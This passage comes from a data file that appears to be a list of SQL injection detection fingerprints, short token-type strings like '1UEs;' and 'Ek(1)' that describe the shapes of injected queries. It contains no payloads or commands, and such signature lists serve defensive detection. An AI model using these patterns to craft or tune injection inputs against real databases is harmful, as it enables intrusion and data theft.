"1BsBs", "1BsBv", "1BsU(", "1BsUE", "1Bsc", "1Bsk(", "1Bsk1", "1Bskf", "1Bskn", "1Bsks", "1Bskv", "1Bso(", "1Bso1", "1Bsof", "1Bson", "1Bsos", "1Bsov", "1Bv", "1Bv&(", "1Bv&1", "1Bv&f", "1Bv&n", "1Bv&s", "1Bv&v", "1Bv,(", "1Bv,f", "1Bv;", "1Bv;c", "1BvB(", "1BvB1", "1BvBf", "1BvBn", "1BvBs", "1BvBv", "1BvU(", "1BvUE", "1Bvc", "1Bvk(", "1Bvk1", "1Bvkf", "1Bvkn", "1Bvks", "1Bvkv", "1Bvo(", "1Bvof", "1Bvos", "1E(1)", "1E(1o", "1E(f(", "1E(n)", "1E(no", "1E(s)", "1E(so", "1E(v)", "1E(vo", "1E1;T", "1E1T(", "1E1T1", "1E1Tf", "1E1Tn", "1E1Ts", "1E1Tv", "1E1UE", "1E1c", "1E1o(", "1E1of", "1E1os", "1E1ov", "1EU(1", "1EU(f", "1EU(n", "1EU(s", "1EU(v", "1EU1,", "1EU1c", "1EU1o", "1EUEf", "1EUEk", "1EUf(", "1EUs,", "1EUsc", "1EUso", "1EUv,", "1EUvc", "1EUvo", "1Ef()", "1Ef(1", "1Ef(f", "1Ef(n", "1Ef(s", "1Ef(v", "1Ek(1", "1Ek(E", "1Ek(f", "1Ek(n", "1Ek(s", "1Ek(v", "1Ek1;", "1Ek1T", "1Ek1U", "1Ek1c", "1Ek1o", "1EkU(", "1EkU1", "1EkUE", "1EkUf", "1EkUs", "1EkUv", "1Ekf(", "1Ekn;", "1EknE", "1EknT", "1EknU", "1Eknc", "1Ekok", "1Eks;", "1EksT", "1EksU", "1Eksc", "1Ekso", "1Ekv;", "1EkvT", "1EkvU", "1Ekvc", "1Ekvo", "1En;T", "1EnEn", "1EnT(", "1EnT1", "1EnTf", "1EnTn", "1EnTs", "1EnTv", "1EnUE", "1Enc", "1Eno(", "1Enof", "1Enos", "1Enov", "1Eokn", "1Es;T", "1EsT(", "1EsT1", "1EsTf", "1EsTn", "1EsTs", "1EsTv", "1EsUE", "1Esc", "1Eso(", "1Eso1", "1Esof", "1Eson", "1Esos", "1Esov", "1Ev;T", "1EvT(", "1EvT1", "1EvTf", "1EvTn", "1EvTs", "1EvTv", "1EvUE", "1Evc", "1Evo(", "1Evof", "1Evos", "1T(1)", "1T(1o", "1T(f(", "1T(n)", "1T(no", "1T(s)", "1T(so", "1T(v)", "1T(vo", "1T1(f", "1T1o(", "1T1of", "1T1os", "1T1ov", "1TE(1", "1TE(f", "1TE(n", "1TE(s", "1TE(v", "1TE1n", "1TE1o", "1TEf(", "1TEk(", "1TEk1", "1TEkf", "1TEkn", "1TEks", "1TEkv", "1TEnn", "1TEno", "1TEsn", "1TEso", "1TEvn", "1TEvo", "1TTnE", "1TTnT", "1TTnk", "1TTnn", "1Tf()", "1Tf(1", "1Tf(f", "1Tf(n", "1Tf(s", "1Tf(v", "1Tn(1", "1Tn(f", "1Tn(s", "1Tn(v", "1Tn1c", "1Tn1o", "1Tn;E", "1Tn;T", "1Tn;n", "1TnE(", "1TnE1", "1TnEf", "1TnEn", "1TnEs", "1TnEv", "1TnT(", "1TnT1", "1TnTf", "1TnTn", "1TnTs", "1TnTv", "1Tnf(", "1Tnkn", "1Tnn:", "1Tnnc", "1Tnno", "1Tno(", "1Tnof", "1Tnos", "1Tnov", "1Tnsc", "1Tnso", "1Tnvc", "1Tnvo", "1Ts(f", "1Tso(", "1Tso1", "1Tsof", "1Tson", "1Tsos", "1Tsov", "1Tv(1", "1Tv(f", "1Tvo(", "1Tvof", "1Tvos", "1U", "1U(1)", "1U(1o", "1U(E(", "1U(E1", "1U(Ef", "1U(Ek", "1U(En", "1U(Es", "1U(Ev", "1U(f(", "1U(n)", "1U(no", "1U(s)", "1U(so", "1U(v)", "1U(vo", "1U1,(", "1U1,f", "1U1c", "1U1o(", "1U1of", "1U1os", "1U1ov", "1U;", "1U;c", "1UE", "1UE(1", "1UE(E", "1UE(f", "1UE(n", "1UE(o", "1UE(s", "1UE(v", "1UE1", "1UE1&", "1UE1(", "1UE1)", "1UE1,", "1UE1;", "1UE1B", "1UE1U", "1UE1c", "1UE1f", "1UE1k", "1UE1n", "1UE1o", "1UE1s", "1UE1v", "1UE;", "1UE;c", "1UEc", "1UEf", "1UEf(", "1UEf,", "1UEf;", "1UEfc", "1UEk", "1UEk(", "1UEk1", "1UEk;", "1UEkc", "1UEkf", "1UEkn", "1UEko", "1UEks", "1UEkv", "1UEn", "1UEn&", "1UEn(", "1UEn)", "1UEn,", "1UEn1", "1UEn;", "1UEnB", "1UEnU", "1UEnc", "1UEnf", "1UEnk", "1UEnn", "1UEno", "1UEns", "1UEok", "1UEon", "1UEs", "1UEs&", "1UEs(", "1UEs)", "1UEs,", "1UEs1", "1UEs;", "1UEsB", "1UEsU", "1UEsc", "1UEsf", "1UEsk", "1UEso", "1UEsv", "1UEv", "1UEv&", "1UEv(", "1UEv)", "1UEv,", "1UEv;", "1UEvB", "1UEvU", "1UEvc", "1UEvf", "1UEvk", "1UEvn", "1UEvo", "1UEvs", "1UTn(", "1UTn1", "1UTnf", "1UTnn", "1UTns", "1UTnv", "1Uc", "1Uf()", "1Uf(1", "1Uf(f", "1Uf(n", "1Uf(s", "1Uf(v", "1Uk(E", "1Uo(E", "1Uon(", "1Uon1", "1Uonf", "1Uons", "1Us,(", "1Us,f", "1Usc", "1Uso(", "1Uso1", "1Usof", "1Uson", "1Usos", "1Usov", "1Uv,(", "1Uv,f", "1Uvc", "1Uvo(", "1Uvof", "1Uvos", "1c", "1f()1", "1f()U", "1f()f", "1f()k", "1f()n", "1f()o", "1f()s", "1f()v", "1f(1)", "1f(1n", "1f(1o", "1f(E(", "1f(E1", "1f(Ef", "1f(Ek", "1f(En", "1f(Es", "1f(Ev", "1f(f(", "1f(n)", "1f(n,", "1f(no", "1f(s)", "1f(so", "1f(v)", "1f(vo", "1k(1o", "1k(f(", "1k(n)", "1k(no", "1k(s)", "1k(so", "1k(v)", "1k(vo", "1k)&(", "1k)&1", "1k)&f", "1k)&n", "1k)&s", "1k)&v", "1k);E", "1k);T", "1k)B(", "1k)B1", "1k)Bf", "1k)Bn", "1k)Bs", "1k)Bv", "1k)E(", "1k)E1", "1k)Ef", "1k)Ek", "1k)En", "1k)Es", "1k)Ev", "1k)UE", "1k)f(", "1k)o(", "1k)of", "1k1", "1k1&(", "1k1&1", "1k1&f", "1k1&n", "1k1&s", "1k1&v", "1k1;", "1k1;E", "1k1;T", "1k1;c", "1k1B(", "1k1B1", "1k1Bf", "1k1Bn", "1k1Bs", "1k1Bv", "1k1E(", "1k1E1", "1k1Ef", "1k1Ek", "1k1En", "1k1Es", "1k1Ev", "1k1U(", "1k1UE", "1k1c", "1k1o(", "1k1of", "1k1os", "1k1ov", "1kUE(", "1kUE1", "1kUEf", "1kUEk", "1kUEn", "1kUEs", "1kUEv", "1kf()", "1kf(1", "1kf(f", "1kf(n", "1kf(s", "1kf(v", "1kn", "1kn&(", "1kn&1", "1kn&f", "1kn&n", "1kn&s", "1kn&v", "1kn;", "1kn;E", "1kn;T", "1kn;c", "1knB(", "1knB1", "1knBf", "1knBn", "1knBs", "1knBv", "1knE(", "1knE1", "1knEf", "1knEn", "1knEs", "1knEv", "1knU(", "1knUE", "1knc", "1ks", "1ks&(", "1ks&1", "1ks&f", "1ks&n", "1ks&s", "1ks&v", "1ks;", "1ks;E", "1ks;T", "1ks;c", "1ksB(", "1ksB1", "1ksBf", "1ksBn", "1ksBs", "1ksBv", "1ksE(", "1ksE1", "1ksEf", "1ksEk", "1ksEn", "1ksEs", "1ksEv", "1ksU(", "1ksUE", "1ksc", "1kso(", "1kso1", "1ksof", "1kson", "1ksos", "1ksov", "1kv", "1kv&(", "1kv&1", "1kv&f", "1kv&n", "1kv&s", "1kv&v", "1kv;", "1kv;E", "1kv;T", "1kv;c", "1kvB(", "1kvB1", "1kvBf", "1kvBn", "1kvBs", "1kvBv", "1kvE(", "1kvE1", "1kvEf", "1kvEk", "1kvEn", "1kvEs", "1kvEv", "1kvU(", "1kvUE", "1kvc", "1kvo(", "1kvof", "1kvos", "1n&f(", "1n(1o", "1n(f(", "1n(s)", "1n(so", "1n(v)", "1n(vo", "1n)UE", "1n,f(", "1nE(1", "1nE(f", "1nE(n", "1nE(s", "1nE(v", "1nE1c", "1nE1o", "1nEf(", "1nEnc", "1nEno", "1nEsc", "1nEso", "1nEvc", "1nEvo", "1nU(E", "1nUE", "1nUE(", "1nUE1", "1nUE;", "1nUEc", "1nUEf", "1nUEk", "1nUEn", "1nUEs", "1nUEv", "1o(1&", "1o(1)", "1o(1,", "1o(1o", "1o(E(", "1o(E1", "1o(EE", "1o(Ef", "1o(Ek", "1o(En", "1o(Eo", "1o(Es", "1o(Ev", "1o(f(", "1o(n&", "1o(n)", "1o(n,", "1o(no", "1o(s&", "1o(s)", "1o(s,", "1o(so", "1o(v&", "1o(v)", "1o(v,", "1o(vo", "1oU(E", "1oUEk", "1oUEn", "1of()", "1of(1", "1of(E", "1of(f", "1of(n", "1of(s", "1of(v", "1ok&(", "1ok&1", "1ok&f", "1ok&n", "1ok&s", "1ok&v", "1ok(1", "1ok(f", "1ok(n", "1ok(s", "1ok(v", "1ok1c", "1ok1o", "1okf(", "1oknc", "1oko(", "1oko1", "1okof", "1okon", "1okos", "1okov", "1oksc", "1okso", "1okvc", "1okvo", "1onsU", "1os&(", "1os&1", "1os&E", "1os&U", "1os&f", "1os&k", "1os&n", "1os&s", "1os&v", "1os(E", "1os(U", "1os)&", "1os),", "1os);", "1os)B", "1os)E", "1os)U", "1os)c", "1os)f", "1os)k", "1os)o", "1os,(", "1os,f", "1os1(", "1os1U", "1os1f", "1os1n", "1os1s", "1os1v", "1os;", "1os;E", "1os;T", "1os;c", "1os;n", "1osA(", "1osAf", "1osAs", "1osAt", "1osAv", "1osB(", "1osB1", "1osBE", "1osBf", "1osBn", "1osBs", "1osBv", "1osE(", "1osE1", "1osEU", "1osEf", "1osEk", "1osEn", "1osEo", "1osEs", "1osEv", "1osT(", "1osT1", "1osTE", "1osTT", "1osTf", "1osTn", "1osTs", "1osTv", "1osU", "1osU(", "1osU1", "1osU;", "1osUE", "1osUT", "1osUc", "1osUf", "1osUk", "1osUo", "1osUs", "1osUv", "1osc", "1osf(", "1osk(", "1osk)", "1osk1", "1oskB", "1oskU", "1oskf", "1oskn", "1osks", "1oskv", "1osv(", "1osvU", "1osvf", "1osvo", "1osvs", "1ov", "1ov&(", "1ov&1", "1ov&E", "1ov&U", "1ov&f", "1ov&k", "1ov&n", "1ov&s", "1ov&v", "1ov(E", "1ov(U", "1ov)&", "1ov),", "1ov);", "1ov)B", "1ov)E", "1ov)U", "1ov)c", "1ov)f", "1ov)k", "1ov)o", "1ov,(", "1ov,f", "1ov;", "1ov;E", "1ov;T", "1ov;c", "1ov;n", "1ovA(", "1ovAf", "1ovAs", "1ovAt", "1ovAv", "1ovB(", "1ovB1", "1ovBE", "1ovBf", "1ovBn", "1ovBs", "1ovBv", "1ovE(", "1ovE1", "1ovEU", "1ovEf", "1ovEk", "1ovEn", "1ovEo", "1ovEs", "1ovEv", "1ovT(", "1ovT1", "1ovTE", "1ovTT", "1ovTf", "1ovTn", "1ovTs", "1ovTv", "1ovU", "1ovU(", "1ovU1", "1ovU;", "1ovUE", "1ovUT", "1ovUc", "1ovUf", "1ovUk", "1ovUo", "1ovUs", "1ovUv", "1ovc", "1ovf(", "1ovk(", "1ovk)", "1ovk1", "1ovkB", "1ovkU", "1ovkf", "1ovkn", "1ovks", "1ovkv", "1ovo(", "1ovoU", "1ovof", "1ovok", "1ovos", "1ovs(", "1ovs1", "1ovsU", "1ovsf", "1ovso", "1ovsv", "1sUE", "1sUE;", "1sUEc", "1sUEk", "1sf()", "1sf(1", "1sf(f", "1sf(n", "1sf(s", "1sf(v", "1sv", "1sv;", "1sv;c", "1svc", "1svo(", "1svof", "1svos", "1vUE", "1vUE;", "1vUEc", "1vUEk", "1vf()", "1vf(1", "1vf(f", "1vf(n", "1vf(s", "1vf(v", "1vo(1", "1vo(f", "1vo(n", "1vo(s", "1vo(v", "1vof(", "1vos(", "1vos1", "1vosU", "1vosf", "1vosv", "1vs", "1vs;", "1vs;c", "1vsc", "1vso(", "1vso1", "1vsof", "1vson", "1vsos", "1vsov", ";T(Ef", ";T(Ek", ";Tknc", "E(1&(", "E(1&1", "E(1&f", "E(1&n", "E(1&s", "E(1&v", "E(1)&", "E(1),", "E(1)1", "E(1);", "E(1)B", "E(1)U", "E(1)c", "E(1)f", "E(1)k", "E(1)n", "E(1)o", "E(1)s", "E(1)v", "E(1,f", "E(1f(", "E(1n)", "E(1o(", "E(1of", "E(1os", "E(1ov", "E(1s)", "E(1v)", "E(1vo", "E(E(1", "E(E(E", "E(E(f", "E(E(n", "E(E(s", "E(E(v", "E(E1&", "E(E1)", "E(E1o", "E(Ef(", "E(Ek(", "E(Ek1", "E(Ekf", "E(Ekn", "E(Eks", "E(Ekv", "E(En&", "E(En)", "E(Eno", "E(Es&", "E(Es)", "E(Eso", "E(Ev&", "E(Ev)", "E(Evo", "E(f()", "E(f(1", "E(f(E", "E(f(f", "E(f(n", "E(f(s", "E(f(v", "E(n&(", "E(n&1", "E(n&f", "E(n&n", "E(n&s", "E(n&v", "E(n(1", "E(n(f", "E(n(s", "E(n(v", "E(n)&", "E(n),", "E(n)1", "E(n);", "E(n)B", "E(n)U", "E(n)c", "E(n)f", "E(n)k", "E(n)n", "E(n)o", "E(n)s", "E(n)v", "E(n,f", "E(n1)", "E(n1o", "E(nf(", "E(no(", "E(nof", "E(nos", "E(nov", "E(s&(", "E(s&1", "E(s&f", "E(s&n", "E(s&s", "E(s&v", "E(s)&", "E(s),", "E(s)1", "E(s);", "E(s)B", "E(s)U", "E(s)c", "E(s)f", "E(s)k", "E(s)n", "E(s)o", "E(s)s", "E(s)v", "E(s,f", "E(s1)", "E(sf(", "E(so(", "E(so1", "E(sof", "E(son", "E(sos", "E(sov", "E(sv)", "E(svo", "E(v&(", "E(v&1", "E(v&f", "E(v&n", "E(v&s", "E(v&v", "E(v)&", "E(v),", "E(v)1", "E(v);", "E(v)B", "E(v)U", "E(v)c", "E(v)f", "E(v)k", "E(v)n", "E(v)o", "E(v)s", "E(v)v", "E(v,f", "E(vf(", "E(vo(", "E(vof", "E(vos", "E(vs)", "E(vso", "E1&(1", "E1&(E", "E1&(f", "E1&(n", "E1&(s", "E1&(v", "E1&1)", "E1&1o", "E1&f(", "E1&n)", "E1&no", "E1&s)", "E1&so", "E1&v)", "E1&vo", "E1)", "E1)&(", "E1)&1", "E1)&f", "E1)&n", "E1)&s", "E1)&v", "E1);", "E1);(", "E1);E", "E1);T", "E1);c", "E1)UE", "E1)c", "E1)kn", "E1)o(", "E1)o1", "E1)of", "E1)on", "E1)os", "E1)ov", "E1,(1", "E1,(f", "E1,(n", "E1,(s", "E1,(v", "E1,f(", "E1;(E", "E1B(1", "E1B(f", "E1B(n", "E1B(s", "E1B(v", "E1B1)", "E1B1o", "E1Bf(", "E1Bn)", "E1Bno", "E1Bs)", "E1Bso", "E1Bv)", "E1Bvo", "E1U(E", "E1UE(", "E1UE1", "E1UEf", "E1UEk", "E1UEn", "E1UEs", "E1UEv", "E1f()", "E1f(1", "E1f(f", "E1f(n", "E1f(s", "E1f(v", "E1k(1", "E1k(E", "E1k(f", "E1k(n", "E1k(s", "E1k(v", "E1k1)", "E1k1k", "E1k1o", "E1kf(", "E1kn", "E1kn)", "E1kn;", "E1knU", "E1knc", "E1knk", "E1ks)", "E1ksk", "E1kso", "E1kv)", "E1kvk", "E1kvo", "E1n)U", "E1n;", "E1n;c", "E1nc", "E1nkn", "E1o(1", "E1o(E", "E1o(f", "E1o(n", "E1o(s", "E1o(v", "E1of(", "E1os&", "E1os(", "E1os)", "E1os,", "E1os1", "E1os;", "E1osB", "E1osU", "E1osf", "E1osk", "E1osv", "E1ov&", "E1ov(", "E1ov)", "E1ov,", "E1ov;", "E1ovB", "E1ovU", "E1ovf", "E1ovk", "E1ovo", "E1ovs", "E1s;", "E1s;c", "E1sc", "E1v", "E1v;", "E1v;c", "E1vc", "E1vo(", "E1vof", "E1vos", "EE(f(", "EEk(f", "Ef()&", "Ef(),", "Ef()1", "Ef();", "Ef()B", "Ef()U", "Ef()f", "Ef()k", "Ef()n", "Ef()o", "Ef()s", "Ef()v", "Ef(1&", "Ef(1)", "Ef(1,", "Ef(1o", "Ef(E(", "Ef(E1", "Ef(Ef", "Ef(Ek", "Ef(En", "Ef(Es", "Ef(Ev", "Ef(f(", "Ef(n&", "Ef(n)", "Ef(n,", "Ef(no", "Ef(o)", "Ef(s&", "Ef(s)", "Ef(s,", "Ef(so", "Ef(v&", "Ef(v)", "Ef(v,", "Ef(vo", "Ek(1&", "Ek(1(", "Ek(1)", "Ek(1,", "Ek(1f", "Ek(1n", "Ek(1o", "Ek(1s", "Ek(1v", "Ek(E(", "Ek(E1", "Ek(Ef", "Ek(Ek", "Ek(En", "Ek(Es", "Ek(Ev", "Ek(f(", "Ek(n&", "Ek(n(", "Ek(n)", "Ek(n,", "Ek(n1", "Ek(nf", "Ek(no", "Ek(s&", "Ek(s(", "Ek(s)", "Ek(s,", "Ek(s1", "Ek(sf", "Ek(so", "Ek(sv", "Ek(v&", "Ek(v(", "Ek(v)", "Ek(v,", "Ek(vf", "Ek(vo", "Ek(vs", "Ek1&(", "Ek1&1", "Ek1&f", "Ek1&n", "Ek1&s", "Ek1&v", "Ek1)", "Ek1)&", "Ek1);", "Ek1)U", "Ek1)c", "Ek1)k", "Ek1)o", "Ek1,(", "Ek1,f", "Ek1;(", "Ek1B(", "Ek1B1", "Ek1Bf", "Ek1Bn", "Ek1Bs", "Ek1Bv", "Ek1U(", "Ek1UE", "Ek1f(", "Ek1k(", "Ek1k1", "Ek1kf", "Ek1kn", "Ek1ks", "Ek1kv", "Ek1n", "Ek1n)", "Ek1n;", "Ek1nc", "Ek1nk", "Ek1o(", "Ek1of", "Ek1os", "Ek1ov", "Ek1s", "Ek1s;", "Ek1sc", "Ek1sf", "Ek1sk", "Ek1v", "Ek1v;", "Ek1vc", "Ek1vf", "Ek1vk", "Ek1vo", "EkE(f", "EkEk(", "Ekf()", "Ekf(1", "Ekf(E", "Ekf(f", "Ekf(n", "Ekf(o", "Ekf(s", "Ekf(v", "Ekn&(", "Ekn&1", "Ekn&f", "Ekn&n", "Ekn&s", "Ekn&v", "Ekn(1", "Ekn(f", "Ekn(s", "Ekn(v", "Ekn)", "Ekn)&", "Ekn);", "Ekn)U", "Ekn)c", "Ekn)k", "Ekn)o", "Ekn,(", "Ekn,f", "Ekn1", "Ekn1;", "Ekn1c", "Ekn1k", "Ekn1o", "Ekn;(", "EknB(", "EknB1", "EknBf", "EknBn", "EknBs", "EknBv", "EknU(", "EknUE", "Eknf(", "Eknk(", "Eknk1", "Eknkf", "Eknkn", "Eknks", "Eknkv", "Eko(1", "Eko(f", "Eko(n", "Eko(s", "Eko(v", "Ekok(", "Ekokn", "Eks&(", "Eks&1", "Eks&f", "Eks&n", "Eks&s", "Eks&v", "Eks)", "Eks)&", "Eks);", "Eks)U", "Eks)c", "Eks)k", "Eks)o", "Eks,(", "Eks,f", "Eks1", "Eks1;", "Eks1c", "Eks1f", "Eks1k", "Eks;(", "EksB(", "EksB1", "EksBf", "EksBn", "EksBs", "EksBv", "EksU(", "EksUE", "Eksf(", "Eksk(", "Eksk1", "Ekskf", "Ekskn", "Eksks", "Ekskv", "Ekso(", "Ekso1", "Eksof", "Ekson", "Eksos", "Eksov", "Eksv", "Eksv;", "Eksvc", "Eksvf", "Eksvk", "Eksvo", "Ekv&(", "Ekv&1", "Ekv&f", "Ekv&n", "Ekv&s", "Ekv&v", "Ekv)", "Ekv)&", "Ekv);", "Ekv)U", "Ekv)c", "Ekv)k", "Ekv)o", "Ekv,(", "Ekv,f", "Ekv;(", "EkvB(", "EkvB1", "EkvBf", "EkvBn", "EkvBs", "EkvBv", "EkvU(", "EkvUE", "Ekvf(", "Ekvk(", "Ekvk1", "Ekvkf", "Ekvkn", "Ekvks", "Ekvkv", "Ekvo(", "Ekvof", "Ekvos", "Ekvs", "Ekvs;", "Ekvsc", "Ekvsf", "Ekvsk", "Ekvso", "En&(1", "En&(E", "En&(f", "En&(n", "En&(s", "En&(v", "En&1)", "En&1o", "En&f(", "En&n)", "En&no", "En&s)", "En&so", "En&v)", "En&vo", "En(1o", "En(f(", "En(s)", "En(so", "En(v)", "En(vo", "En)", "En)&(", "En)&1", "En)&f", "En)&n", "En)&s", "En)&v", "En);", "En);(", "En);E", "En);T", "En);c", "En)UE", "En)c", "En)kn", "En)o(", "En)o1", "En)of", "En)on", "En)os", "En)ov", "En,(1", "En,(f", "En,(n", "En,(s", "En,(v", "En,f(", "En1;", "En1;c", "En1o(", "En1of", "En1os", "En1ov", "En;(E", "EnB(1", "EnB(f", "EnB(n", "EnB(s", "EnB(v", "EnB1)", "EnB1o", "EnBf(", "EnBn)", "EnBno", "EnBs)", "EnBso", "EnBv)", "EnBvo", "EnU(E", "EnUE(", "EnUE1", "EnUEf", "EnUEk", "EnUEn", "EnUEs", "EnUEv", "Enf()", "Enf(1", "Enf(f", "Enf(n", "Enf(s", "Enf(v", "Enk(1", "Enk(E", "Enk(f", "Enk(n", "Enk(s", "Enk(v", "Enk1)", "Enk1k", "Enk1o", "Enkf(", "Enkn)", "Enkn,", "Enkn;", "EnknB", "EnknU", "Enknc", "Enknk", "Enks)", "Enksk", "Enkso", "Enkv)", "Enkvk", "Enkvo", "Eno(1", "Eno(E", "Eno(f", "Eno(n", "Eno(s", "Eno(v", "Enof(", "Enos&", "Enos(", "Enos)", "Enos,", "Enos1", "Enos;", "EnosB", "EnosU", "Enosf", "Enosk", "Enosv", "Enov&", "Enov(", "Enov)", "Enov,", "Enov;", "EnovB", "EnovU", "Enovf", "Enovk", "Enovo", "Enovs", "Eok(E", "Eoknk", "Es&(1", "Es&(E", "Es&(f", "Es&(n", "Es&(s", "Es&(v", "Es&1)", "Es&1o", "Es&f(", "Es&n)", "Es&no", "Es&s)", "Es&so", "Es&v)", "Es&vo", "Es)", "Es)&(", "Es)&1", "Es)&f", "Es)&n", "Es)&s", "Es)&v", "Es);", "Es);(", "Es);E", "Es);T", "Es);c", "Es)UE", "Es)c", "Es)kn", "Es)o(", "Es)o1", "Es)of", "Es)on", "Es)os", "Es)ov", "Es,(1", "Es,(f", "Es,(n", "Es,(s", "Es,(v", "Es,f(", "Es1", "Es1;", "Es1;c", "Es1c", "Es;(E", "EsB(1", "EsB(f", "EsB(n", "EsB(s", "EsB(v", "EsB1)", "EsB1o", "EsBf(", "EsBn)", "EsBno", "EsBs)", "EsBso", "EsBv)", "EsBvo", "EsU(E", "EsUE(", "EsUE1", "EsUEf", "EsUEk", "EsUEn", "EsUEs", "EsUEv", "Esf()", "Esf(1", "Esf(f", "Esf(n", "Esf(s", "Esf(v", "Esk(1", "Esk(E", "Esk(f", "Esk(n", "Esk(s", "Esk(v", "Esk1)", "Esk1k", "Esk1o", "Eskf(", "Eskn", "Eskn)", "Eskn;", "EsknU", "Esknc", "Esknk", "Esks)", "Esksk", "Eskso", "Eskv)", "Eskvk", "Eskvo", "Eso(1", "Eso(E", "Eso(f", "Eso(n", "Eso(s", "Eso(v", "Eso1&", "Eso1(", "Eso1)", "Eso1,", "Eso1;", "Eso1B", "Eso1U", "Eso1f", "Eso1k", "Eso1n", "Eso1s", "Eso1v", "Esof(", "Eson&", "Eson(", "Eson)", "Eson,", "Eson1", "Eson;", "EsonB", "EsonU", "Esonf", "Esonk", "Esos&", "Esos(", "Esos)", "Esos,", "Esos1", "Esos;", "EsosB", "EsosU", "Esosf", "Esosk", "Esosv", "Esov&", "Esov(", "Esov)", "Esov,", "Esov;", "EsovB", "EsovU", "Esovf", "Esovk", "Esovo", "Esovs", "Esv", "Esv;", "Esv;c", "Esvc", "Esvo(", "Esvof", "Esvos", "Ev&(1", "Ev&(E", "Ev&(f", "Ev&(n", "Ev&(s", "Ev&(v", "Ev&1)", "Ev&1o", "Ev&f(", "Ev&n)", "Ev&no", "Ev&s)", "Ev&so", "Ev&v)", "Ev&vo", "Ev)", "Ev)&(", "Ev)&1", "Ev)&f", "Ev)&n", "Ev)&s", "Ev)&v", "Ev);", "Ev);(", "Ev);E", "Ev);T", "Ev);c", "Ev)UE", "Ev)c", "Ev)kn", "Ev)o(", "Ev)o1", "Ev)of", "Ev)on", "Ev)os", "Ev)ov", "Ev,(1", "Ev,(f", "Ev,(n", "Ev,(s", "Ev,(v", "Ev,f(", "Ev;(E", "EvB(1", "EvB(f", "EvB(n", "EvB(s", "EvB(v", "EvB1)", "EvB1o", "EvBf(", "EvBn)", "EvBno", "EvBs)", "EvBso", "EvBv)", "EvBvo", "EvU(E", "EvUE(", "EvUE1", "EvUEf", "EvUEk", "EvUEn", "EvUEs", "EvUEv", "Evf()", "Evf(1", "Evf(f", "Evf(n", "Evf(s", "Evf(v", "Evk(1", "Evk(E", "Evk(f", "Evk(n", "Evk(s", "Evk(v", "Evk1)", "Evk1k", "Evk1o", "Evkf(", "Evkn", "Evkn)", "Evkn;", "EvknU", "Evknc", "Evknk", "Evks)", "Evksk", "Evkso", "Evkv)", "Evkvk", "Evkvo", "Evn", "Evn)U", "Evn;", "Evn;c", "Evnc", "Evnkn", "Evno(", "Evnof", "Evnos", "Evnov", "Evo(1", "Evo(E", "Evo(f", "Evo(n", "Evo(s", "Evo(v", "Evof(", "Evos&", "Evos(", "Evos)", "Evos,", "Evos1", "Evos;", "EvosB", "EvosU", "Evosf", "Evosk", "Evosv", "Evs", "Evs;", "Evs;c", "Evsc", "Evso(", "Evso1", "Evsof", "Evson", "Evsos", "Evsov", "T(1)f", "T(1)o", "T(1f(", "T(1n)", "T(1o(", "T(1of", "T(1os", "T(1ov", "T(1s)", "T(1v)", "T(1vo", "T(f()", "T(f(1", "T(f(f", "T(f(n", "T(f(s", "T(f(v", "T(n(1", "T(n(f", "T(n(s", "T(n(v", "T(n)f", "T(n)o", "T(n1)", "T(n1o", "T(nf(", "T(nn)", "T(nno", "T(no(", "T(nof", "T(nos", "T(nov", "T(ns)", "T(nso", "T(nv)", "T(nvo", "T(s)f", "T(s)o", "T(s1)", "T(sf(", "T(sn)", "T(sno", "T(so(", "T(so1", "T(sof", "T(son", "T(sos", "T(sov", "T(sv)", "T(svo", "T(v)f", "T(v)o", "T(vf(", "T(vo(", "T(vof", "T(vos", "T(vs)", "T(vso", "T(vv)", "T1f(1", "T1f(f", "T1f(n", "T1f(s", "T1f(v", "T1o(1", "T1o(f", "T1o(n", "T1o(s", "T1o(v", "T1of(", "T1osf", "T1ovf", "T1ovo", "Tf()f", "Tf()o", "Tf(1)", "Tf(1o", "Tf(f(", "Tf(n)", "Tf(no", "Tf(s)", "Tf(so", "Tf(v)", "Tf(vo", "Tn(1)", "Tn(1o", "Tn(f(", "Tn(s)", "Tn(so", "Tn(v)", "Tn(vo", "Tn1;", "Tn1;c", "Tn1o(", "Tn1of", "Tn1os", "Tn1ov", "Tnf()", "Tnf(1", "Tnf(f", "Tnf(n", "Tnf(s", "Tnf(v", "Tnn;", "Tnn;c", "Tnno(", "Tnnof", "Tnnos", "Tnnov", "Tno(1", "Tno(f", "Tno(n", "Tno(s", "Tno(v", "Tnof(", "Tnosf", "Tnovf", "Tnovo", "Tns;", "Tns;c", "Tnso(", "Tnso1", "Tnsof", "Tnson", "Tnsos", "Tnsov", "Tnv;", "Tnv;c", "Tnvo(", "Tnvof", "Tnvos", "Tsf(1", "Tsf(f", "Tsf(n", "Tsf(s", "Tsf(v", "Tso(1", "Tso(f", "Tso(n", "Tso(s", "Tso(v", "Tso1f", "Tsof(", "Tsonf", "Tsosf", "Tsovf", "Tsovo", "Tvf(1", "Tvf(f", "Tvf(n", "Tvf(s", "Tvf(v", "Tvo(1", "Tvo(f", "Tvo(n", "Tvo(s", "Tvo(v", "Tvof(", "Tvosf", "U(E(1", "U(E(f", "U(E(k", "U(E(n", "U(E(s", "U(E(v", "U(E1)", "U(E1o", "U(Ef(", "U(Ek(", "U(Ek1", "U(Ekf", "U(Ekn", "U(Eko", "U(Eks", "U(Ekv", "U(En)", "U(Enk", "U(Eno", "U(Eok", "U(Es)", "U(Eso", "U(Ev)", "U(Evo", "UE(1)", "UE(1,", "UE(1o", "UE(f(", "UE(n)", "UE(n,", "UE(no", "UE(s)", "UE(s,", "UE(so", "UE(v)", "UE(v,", "UE(vo", "UE1", "UE1,(", "UE1,f", "UE1;", "UE1;c", "UE1c", "UE1k(", "UE1k1", "UE1kf", "UE1kn", "UE1ks", "UE1kv", "UE1o(", "UE1of", "UE1os", "UE1ov", "UEf()", "UEf(1", "UEf(f", "UEf(n", "UEf(s", "UEf(v", "UEk(1", "UEk(f", "UEk(n", "UEk(s", "UEk(v", "UEk1", "UEk1,", "UEk1;", "UEk1c", "UEk1k", "UEk1o", "UEkf(", "UEkn", "UEkn(", "UEkn,", "UEkn;", "UEknc", "UEknk", "UEks", "UEks,", "UEks;", "UEksc", "UEksk", "UEkso", "UEkv", "UEkv,", "UEkv;", "UEkvc", "UEkvk", "UEkvo", "UEn()", "UEn,(", "UEn,f", "UEn;", "UEn;c", "UEnc", "UEnk(", "UEnk1", "UEnkf", "UEnkn", "UEnks", "UEnkv", "UEno(", "UEnof", "UEnos", "UEnov", "UEs", "UEs,(", "UEs,f", "UEs;", "UEs;c", "UEsc", "UEsk(", "UEsk1", "UEskf", "UEskn", "UEsks", "UEskv", "UEso(", "UEso1", "UEsof", "UEson", "UEsos", "UEsov", 